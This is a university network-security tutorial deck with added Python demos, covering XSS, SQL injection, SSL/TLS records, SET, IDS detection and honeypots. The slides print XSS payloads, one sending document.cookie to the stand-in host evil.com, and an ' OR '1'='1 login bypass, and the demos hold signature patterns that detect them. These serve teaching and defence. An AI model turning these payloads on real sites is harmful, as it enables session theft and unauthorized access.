Network Security 32548 Tutorial 10 - PowerPoint PPT Presentation

About This Presentation
Title: Network Security 32548 Tutorial 10
Slides: 22
Provided by: patric218
Transcript and Presenter's Notes

Title: Network Security 32548 Tutorial 10


1
Network Security 32548 Tutorial 10/11
  • Tutor: Patrick Tran
  • Email: tiptran@it.uts.edu.au
  • Office Location: Room CB10.05.210
  • Personal Link: http://www-staff.it.uts.edu.au/tiptran/

2
  • Browser security
  • Authentication to server
  • Client certificates (bank → client)
  • Authentication methods (password, tokens)
  • Integrity
  • Viruses, cross-site scripting
  • Confidentiality
  • Cookie stealing → impersonation
  • Example exploit: XSS to steal cookies
  • A website allows a user to post a message that is
    displayed to other users.
  • The attacker types JavaScript into the text area:
  • <script>alert(document.cookie)</script> → runs on
    page load → so the site removes <script> tags
  • <a href="javascript:alert(document.cookie)">Click
    me</a> and <a href="t1.html"
    onClick="alert(document.cookie)">test</a> → run
    when the link is clicked → do not click!
  • <a href="t1.html"
    onMouseOver="alert(document.cookie)">Test</a> →
    runs when the pointer moves over the link, no
    click needed
  • <script>document.location =
    'http://evil.com/blah.cgi?cookie=' +
    document.cookie</script> → redirection (evil
    website, malicious script, cookies recorded)
  • Removing <script> tags is not enough: event
    handler attributes and javascript: URLs execute
    too, so the message must be HTML-encoded when it
    is displayed, and session cookies should be set
    HttpOnly so script cannot read them.
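The following is an added example (not code from the slides) that replays the five payloads above against the slide's naive defence, stripping <script> tags, and against proper output encoding. The message board, the wrapper HTML in render_post and the contains_active_content heuristic are assumptions made for the demonstration.

```python
import html
import re

# The slide's payloads, reassembled (constructed test input).
PAYLOADS = [
    "<script>alert(document.cookie)</script>",
    '<a href="javascript:alert(document.cookie)">Click me</a>',
    '<a href="t1.html" onClick="alert(document.cookie)">test</a>',
    '<a href="t1.html" onMouseOver="alert(document.cookie)">Test</a>',
    "<script>document.location='http://evil.com/blah.cgi?cookie='+document.cookie</script>",
]

SCRIPT_TAG = re.compile(r"</?script[^>]*>", re.IGNORECASE)

# Heuristic used only to grade the sanitizers: a tag is "live" if it is a
# script element, or any element carrying an on* event handler attribute
# or a javascript: URL. A real browser has many more execution sinks.
ACTIVE_MARKUP = re.compile(
    r"<(script|[a-z]+[^>]*(\son[a-z]+\s*=|javascript:))", re.IGNORECASE)


def strip_script_tags(message: str) -> str:
    """The slide's naive filter: delete <script> tags and nothing else."""
    return SCRIPT_TAG.sub("", message)


def escape_for_html(message: str) -> str:
    """Output encoding: render the message as text inside an HTML body, so
    the browser never sees a tag, attribute or URL it could execute."""
    return html.escape(message, quote=True)


def contains_active_content(fragment: str) -> bool:
    return ACTIVE_MARKUP.search(fragment) is not None


def render_post(message: str, sanitizer=escape_for_html) -> str:
    """The page as other users receive it: the posted message embedded in
    the (assumed) board template after passing through the sanitizer."""
    return ('<html><body><div class="post">' + sanitizer(message)
            + "</div></body></html>")


def survivors(sanitizer) -> list:
    """Payloads that still carry executable content after the sanitizer."""
    return [p for p in PAYLOADS
            if contains_active_content(render_post(p, sanitizer))]


if __name__ == "__main__":
    for name, fn in (("strip <script>", strip_script_tags),
                     ("HTML-escape", escape_for_html)):
        print(f"{name}: {len(survivors(fn))} of {len(PAYLOADS)} payloads still live")
```

Stripping tags leaves the three anchor-based payloads intact, which is exactly the progression the slide walks through; escaping at output time neutralises all five because the browser parses &lt;a ...&gt; as text, not markup.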

3
  • Server security
  • Web server with HTML rendering capability
  • SQL injection
  • Intended login query (Username and Password are
    copied from the form):
    SELECT UserList.Username FROM UserList
    WHERE UserList.Username = 'Username'
    AND UserList.Password = 'Password'
  • With the password field set to
    password' OR '1'='1 the query becomes:
    SELECT UserList.Username FROM UserList
    WHERE UserList.Username = 'Username'
    AND UserList.Password = 'password' OR '1'='1'
    → the OR '1'='1' clause is always true, so the
    login succeeds without a valid password
  • Protect servers by using an application gateway
    (proxy server):
  • Input validation
  • Authentication, authorization
  • Disallow direct communication to the servers;
    protect the servers behind the gateway
  • Load balancing (protection from DoS)
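An added example (not from the slides) that builds the slide's login query both ways against a constructed in-memory SQLite table. The UserList contents and the plaintext password column mirror the slide's query and are assumptions; a real system stores password hashes.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample UserList table; assumed for the demonstration."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE UserList (Username TEXT, Password TEXT)")
    conn.executemany("INSERT INTO UserList VALUES (?, ?)",
                     [("alice", "correct horse"), ("bob", "hunter2")])
    return conn


def login_vulnerable(conn, username: str, password: str):
    # The slide's query built by string concatenation: attacker-controlled
    # text becomes part of the SQL grammar, so a quote in the password
    # terminates the literal and the rest is parsed as SQL.
    sql = ("SELECT UserList.Username FROM UserList "
           "WHERE UserList.Username = '" + username + "' "
           "AND UserList.Password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username: str, password: str):
    # Same query with bound parameters: the driver passes the values
    # separately from the statement text, so quotes in the input are
    # data and can never change the statement's structure.
    sql = ("SELECT UserList.Username FROM UserList "
           "WHERE UserList.Username = ? AND UserList.Password = ?")
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    injected = "password' OR '1'='1"
    print("vulnerable:", login_vulnerable(db, "nobody", injected))
    print("safe:      ", login_safe(db, "nobody", injected))
```

With the injected password the concatenated WHERE clause reads Username = 'nobody' AND Password = 'password' OR '1'='1'; AND binds tighter than OR, so the clause is true for every row and the first user comes back as "logged in". The parameterised version compares the whole string, quotes included, against the stored password and finds nothing.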

4
  • SECURE SOCKET LAYER (SSL)
  • Developed by Netscape (credit cards, VPN, ...)
  • Confidentiality, integrity, authenticity
  • Uses the web browser only → simple, easy to set
    up, cheap
  • Public/private key PKI certificates
  • The client machine is not authenticated by default
    → it needs to be secured (server authentication
    by default, but mutual authentication is possible)
  • Timeouts and re-authentication (after periods of
    inactivity)
  • Increased load (encryption/decryption, and every
    new connection requires a handshake)
  • Adds encryption and authentication to HTTP, FTP
    (HTTPS is slower than HTTP)
  • SSL → TLS (Transport Layer Security)
  • TLS handshake:
  • Cipher and hash negotiation
  • Server authentication
  • Secret key exchange
  • Start secure communication

6
  • 3. SSL has two layers of protocols; what is the
    lower layer called and what is its function? What
    are the three upper "housekeeping" protocols
    called, and what are their functions?
  • SSL Record Protocol
  • Base protocol used by the upper-layer protocols
    of SSL
  • Encapsulates higher-level protocols
  • Provides two services for SSL connections:
  • Confidentiality: encrypts application data
    (symmetric encryption)
  • Integrity: HMAC (shared secret key)
  • Compression (optional)

7
  • The SSL Change Cipher Spec Protocol
  • Signals that the cipher suite negotiated by the
    handshake now takes effect
  • Moves the pending state to the current one after
    the negotiations have been completed
  • The SSL Alert Protocol
  • SSL error messages between client and server
  • Warning or fatal → a fatal alert terminates the
    connection immediately
  • The SSL Handshake Protocol
  • Establishes an SSL session (a session is a
    negotiated set of parameters; a connection is an
    actual transport link; one session can be shared
    by many connections, 1-to-many)
  • Authentication of servers and clients
  • Negotiation of the cryptographic algorithms to be
    used
  • All of this completes before any application data
    is transferred
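An added example (not code from the slides) of the two Record Protocol services from question 3: HMAC over the sequence number, header and fragment for integrity, then symmetric encryption of fragment plus MAC, following the MAC-then-encrypt layout of SSL 3.0/TLS 1.2 (TLS 1.3 replaced this with AEAD ciphers). The keys are assumed to have come out of the handshake's key derivation, and the cipher is a demonstration keystream (HMAC-SHA256 in counter mode) standing in for the negotiated block or stream cipher.

```python
import hashlib
import hmac
import struct

VERSION = 0x0303          # TLS 1.2 version field on the wire
APPLICATION_DATA = 23     # record content type for application data
MAC_LEN = 32              # HMAC-SHA256 tag length


def _keystream(key: bytes, seq: int, length: int) -> bytes:
    """Demonstration stream cipher: stands in for the negotiated cipher."""
    out, block = b"", 0
    while len(out) < length:
        out += hmac.new(key, struct.pack(">QQ", seq, block), hashlib.sha256).digest()
        block += 1
    return out[:length]


def _xor(data: bytes, pad: bytes) -> bytes:
    return bytes(a ^ b for a, b in zip(data, pad))


class RecordLayer:
    """One direction of a connection. The peer holds an instance with the
    same keys, derived by both sides from the handshake's shared secret."""

    def __init__(self, mac_key: bytes, enc_key: bytes):
        self.mac_key, self.enc_key = mac_key, enc_key
        self.seq = 0   # implicit 64-bit sequence number, never transmitted

    def _mac(self, seq: int, content_type: int, fragment: bytes) -> bytes:
        # MAC input (RFC 5246 6.2.3.1): seq_num || type || version || length || fragment
        header = struct.pack(">QBHH", seq, content_type, VERSION, len(fragment))
        return hmac.new(self.mac_key, header + fragment, hashlib.sha256).digest()

    def protect(self, fragment: bytes, content_type: int = APPLICATION_DATA) -> bytes:
        # Integrity: MAC the plaintext. Confidentiality: encrypt fragment || MAC.
        plaintext = fragment + self._mac(self.seq, content_type, fragment)
        body = _xor(plaintext, _keystream(self.enc_key, self.seq, len(plaintext)))
        self.seq += 1
        return struct.pack(">BHH", content_type, VERSION, len(body)) + body

    def unprotect(self, record: bytes) -> bytes:
        content_type, version, length = struct.unpack(">BHH", record[:5])
        body = record[5:5 + length]
        if version != VERSION or len(body) != length or length < MAC_LEN:
            raise ValueError("decode_error")
        plaintext = _xor(body, _keystream(self.enc_key, self.seq, length))
        fragment, tag = plaintext[:-MAC_LEN], plaintext[-MAC_LEN:]
        if not hmac.compare_digest(tag, self._mac(self.seq, content_type, fragment)):
            # A real implementation sends a fatal bad_record_mac alert here
            # and tears the connection down (the Alert Protocol's job).
            raise ValueError("bad_record_mac")
        self.seq += 1
        return fragment


def _accepts(receiver: RecordLayer, record: bytes) -> bool:
    try:
        receiver.unprotect(record)
        return True
    except ValueError:
        return False


def demo() -> dict:
    """Round trip, then a replay and a tampered record, against the receiver."""
    keys = (b"m" * 32, b"e" * 32)   # assumed handshake-derived MAC and cipher keys
    sender, receiver = RecordLayer(*keys), RecordLayer(*keys)
    message = b"GET / HTTP/1.1\r\n"
    record = sender.protect(message)
    results = {"roundtrip": receiver.unprotect(record) == message}
    results["replay_rejected"] = not _accepts(receiver, record)
    tampered = record[:-1] + bytes([record[-1] ^ 0x01])
    results["tamper_rejected"] = not _accepts(RecordLayer(*keys), tampered)
    return results


if __name__ == "__main__":
    print(demo())
```

Two details worth noticing: the sequence number is part of the MAC input but never sent, so a replayed record fails verification because the receiver has moved on; and the MAC is checked with a constant-time comparison so that tag verification itself does not leak timing information.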

8
  • SSL handshake (RSA key exchange)
  • Certificate
  • The server sends its certificate to the browser.
  • Validation
  • The browser verifies the digital signature on the
    certificate
  • and checks the SSL certificate (name, expiration
    date, certificate authority (CA))
  • Encryption
  • The browser creates a random secret and encrypts
    it with the server's public key
  • Both sides derive the session key from that
    secret; application data is then encrypted with
    the session key

9
SET Secure Electronic Transactions
  • Protect internet credit card transactions
  • Developed by VISA and MasterCard
  • Provides
  • Privacy (encryption)
  • Integrity (hash and digital signature)
  • Authentication and non-repudiation (digital
    certificates and public key encryption)
  • Difficulties
  • Interoperability between SET applications of
    different software vendors.
  • Integration with legacy systems
  • SET transactions are slow and expensive to
    implement
  • Not portable (requires both software and
    certificates to be installed on the cardholder's
    local machine)
  • Not very safe on the cardholder's side
    (certificates are stored on the local machine!)

11
  • 6. SET is designed solely to support the use of
    credit card transactions
  • (a) Compare the security of using SET with using
    https for a credit card transaction.
  • Similar to SSL
  • Authentication and integrity (public key
    certificates)
  • Different from SSL
  • With SSL/HTTPS the merchant receives the
    customer's card details
  • SET restricts the merchant to the order
    information (the payment information is encrypted
    for the financial institution only)

12
  • (b) SET requires customer and merchant to have a
    digital certificate, signed by a CA. Has this
    requirement been relaxed now? Should it be
    relaxed?
  • SSL/TLS protects credit card details from
    eavesdropping → but what about a dishonest client
    or merchant?
  • SET requires certificate registration
  • Ordering over the phone with a credit card number
    (maybe OK now!)
  • Ordering over the Internet with a credit card
    number still needs:
  • Certificate → digital signature
  • Upon registration → secret number

13
  • 7. In SET, what is the purpose of the customer's
    browser sending the Order Information (OI) in
    clear text, and the Payment Information (PI)
    encrypted with the payment gateway's public key?
  • 8. In SET, although the OI is unencrypted, how
    does the merchant know the order details have not
    been tampered with by Trudy?
  • OI is in the clear → no need to keep it secret
    from the merchant
  • OI is larger than PI; no encryption → less
    processing
  • PI is only available to the bank → encrypted with
    the bank's (payment gateway's) public key
  • OI is integrity-checked by a hash function: the
    customer signs the hashes of OI and PI together
    (the SET dual signature), so any change to the OI
    breaks the signature the merchant verifies

14
  • 11. For the following insecure applications, list
    which secure protocol you would use as a
    replacement: HTTP, FTP, SMTP, TELNET, DNS
  • 9. What is S-HTTP and how does it differ from
    SSL?
  • HTTP → S-HTTP or HTTPS
  • S-HTTP: a security extension of HTTP (application
    layer), protects on an individual-message basis
  • HTTPS: normal HTTP over SSL (transport layer),
    secures the whole connection between the two
    endpoints
  • FTP → FTPS (FTP over SSL/TLS)
  • SMTP → S/MIME or PGP (protects the message
    content end to end)
  • TELNET → SSH
  • DNS → DNSSEC
  • Security extensions: origin authentication and
    integrity of DNS data (signed records)
  • Does not provide confidentiality
  • Protects DNS from cache poisoning:
  • the ISP's DNS server caches previous answers
  • compromise the DNS server → poison its IP address
    entries → users are sent to fake sites
  • Does not protect against DDoS attacks.

15
INTRUSION DETECTION SYSTEM (IDS)
  • 1. State what the terms IDS and IPS stand for,
    and briefly explain the difference between them.
  • IDS: Intrusion Detection System, observes and
    alerts; IPS: Intrusion Prevention System, sits
    inline and can block the traffic it flags
  • 5. Discuss the differences between a firewall and
    an IDS, especially if a decision is taken to
    prosecute a cracker.
  • IDS versus firewall:
  • Simplicity
  • Passive / proactive
  • Inline / out-of-band
  • Timeliness
  • Evidence: the events and captured traffic an IDS
    records are what a prosecution needs; a firewall
    log only shows allow/deny decisions

16
  • 3. Discuss the timeliness of IDS, ranging from
    examining log files to real-time IPS.
  • On the fly (real time):
  • Faster response time
  • Needs large memory to hold the recent events
  • Smaller time window → limited view of slow or
    distributed attacks
  • Post mortem (log analysis):
  • Data storage for history records (also
    susceptible to intrusion)
  • 4. Briefly explain and justify possible placement
    options for IDS.
  • Network-based IDS
  • Deploys special sensors at strategic locations
    (gateways, routers)
  • Inspects network traffic
  • Looks for violations of protocols and unusual
    connection patterns
  • Looks for malicious command sequences (data
    portion of the packet)
  • Host-based IDS
  • Examines system usage activities (logs, file
    integrity checks)
  • Uses OS auditing mechanisms

17
  • Host-based IDS
  • Can monitor user-specific activities (access
    privileges) → a NIDS cannot
  • Provides a second line of defence (after the
    network-based IDS)
  • Network-based IDS
  • Can detect DoS and port scans
  • Can detect server-specific attacks (targets in
    the DMZ such as web servers, mail servers)
  • Behind a firewall:
  • Provides a second line of defence
  • Verifies the effectiveness of the firewall
  • Sees only traffic the firewall lets through, so
    it is not fully utilized
  • Outside a firewall:
  • Gains more knowledge about network attacks (sees
    everything aimed at the network, at the cost of
    many more alerts)

18
  • 9. Briefly explain the difference between misuse
    and anomaly detection, and discuss how they would
    be used.
  • Misuse detection: detects activities matching
    known attack signatures
  • Concern: how to collect the known attacks
  • Cannot detect new/novel attacks (even trivial
    variants of known ones)
  • Low false-alarm rate (but an attack it does not
    know simply bypasses it)
  • Must keep the signature database updated
  • Anomaly detection: detects statistically
    significant deviation from an established profile
    of normal activity
  • Concern: how to build the profile of normal users
    (quite complicated)
  • High false-alarm rate
  • Can detect novel attacks
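An added example (not from the slides) that runs both detection styles over a constructed web-server log: two request signatures for misuse detection, and a per-client request-rate threshold (baseline mean plus three standard deviations) for anomaly detection. The log format, the baseline counts, the two signatures and the client addresses are all assumptions made for the demonstration.

```python
import re
from collections import Counter
from statistics import mean, pstdev
from urllib.parse import unquote_plus

# Constructed sample log: one SQL injection probe, one <script> XSS probe,
# one XSS variant the signatures do not know, a busy but legitimate client
# (10.0.0.5) and a scanner walking the site (10.0.0.42).
LOG_LINES = [
    '10.0.0.5 - [10:00:01] "GET /index.html HTTP/1.1" 200',
    '10.0.0.5 - [10:00:05] "GET /about.html HTTP/1.1" 200',
    "10.0.0.9 - [10:00:07] \"GET /login?user=admin'+OR+'1'='1 HTTP/1.1\" 200",
    '10.0.0.7 - [10:00:09] "GET /search?q=<script>alert(document.cookie)</script> HTTP/1.1" 200',
    '10.0.0.7 - [10:00:12] "GET /search?q=<img+src=x+onerror=alert(1)> HTTP/1.1" 200',
]
LOG_LINES += [f'10.0.0.5 - [10:00:{20 + i:02d}] "GET /asset{i}.css HTTP/1.1" 200'
              for i in range(7)]
LOG_LINES += [f'10.0.0.42 - [10:01:{i:02d}] "GET /p{i} HTTP/1.1" 404'
              for i in range(40)]

# Constructed baseline: requests per client in earlier, attack-free windows
# (this is the "profile of normal activity" the slide says is hard to build).
BASELINE = [3, 5, 4, 6, 2, 5, 4, 3]

LINE_RE = re.compile(r'^(\S+) - \[(\S+)\] "(\S+) (\S+) HTTP/1\.1" (\d+)$')

# Misuse signatures: known-bad patterns in the decoded request path.
SIGNATURES = {
    "sqli_or_true": re.compile(r"'\s*OR\s*'1'\s*=\s*'1", re.IGNORECASE),
    "xss_script_tag": re.compile(r"<script", re.IGNORECASE),
}


def parse(line: str):
    """Return (client_ip, decoded_path, status) or None for an unparsable line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, _ts, _method, path, status = m.groups()
    return ip, unquote_plus(path), int(status)


def misuse_detect(lines):
    """Misuse detection: flag each request that matches a known signature."""
    hits = []
    for line in lines:
        parsed = parse(line)
        if parsed is None:
            continue
        ip, path, _status = parsed
        for name, pattern in SIGNATURES.items():
            if pattern.search(path):
                hits.append((ip, name, path))
                break
    return hits


def anomaly_detect(lines, baseline, k: float = 3.0):
    """Anomaly detection: flag clients whose request count in this window
    exceeds the baseline mean by more than k standard deviations."""
    threshold = mean(baseline) + k * pstdev(baseline)
    counts = Counter(p[0] for p in map(parse, lines) if p)
    return sorted(ip for ip, n in counts.items() if n > threshold)


if __name__ == "__main__":
    for ip, name, path in misuse_detect(LOG_LINES):
        print(f"signature {name} from {ip}: {path}")
    print("anomalous clients:", anomaly_detect(LOG_LINES, BASELINE))
```

The run shows both trade-offs from the slide at once: the onerror variant slips past the signatures although it is a trivial rewrite of the <script> payload, and the anomaly detector catches the scanner but also raises a false alarm on 10.0.0.5, whose nine requests were only a page loading its stylesheets.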

19
  • 11. State the difference between a honeynet and a
    honeypot
  • Honeypot
  • Deception (looks like production) → detection
  • Has no authorized activity
  • Any interaction with the honeypot comes from
    attackers → low false-alarm rate
  • Captures a small amount of data of very high value
    → no need to filter out legitimate traffic
  • Compromising the honeypot does not affect other,
    non-honeypot machines
  • Collects data to learn which technologies /
    vulnerabilities an attacker uses / exploits
  • How it helps
  • Confuses hackers and makes them waste their time
    and resources
  • Learn emerging hacking techniques and identify the
    hackers → prevent / prosecute / improve security

20
  • Honeynet
  • Many honeypots connected in a real network, behind
    a firewall and an IDS
  • Targets more attackers
  • Collects more realistic data
  • Data control: controls the data flow out of the
    honeynet to protect non-honeypot machines, without
    the hacker noticing, while still giving the hacker
    enough flexibility
  • Data capture: records the attacker's activity
    without the hacker noticing, preserving the
    integrity of the captured data
  • Data collection: gathers data from multiple
    honeynets

21
Questions?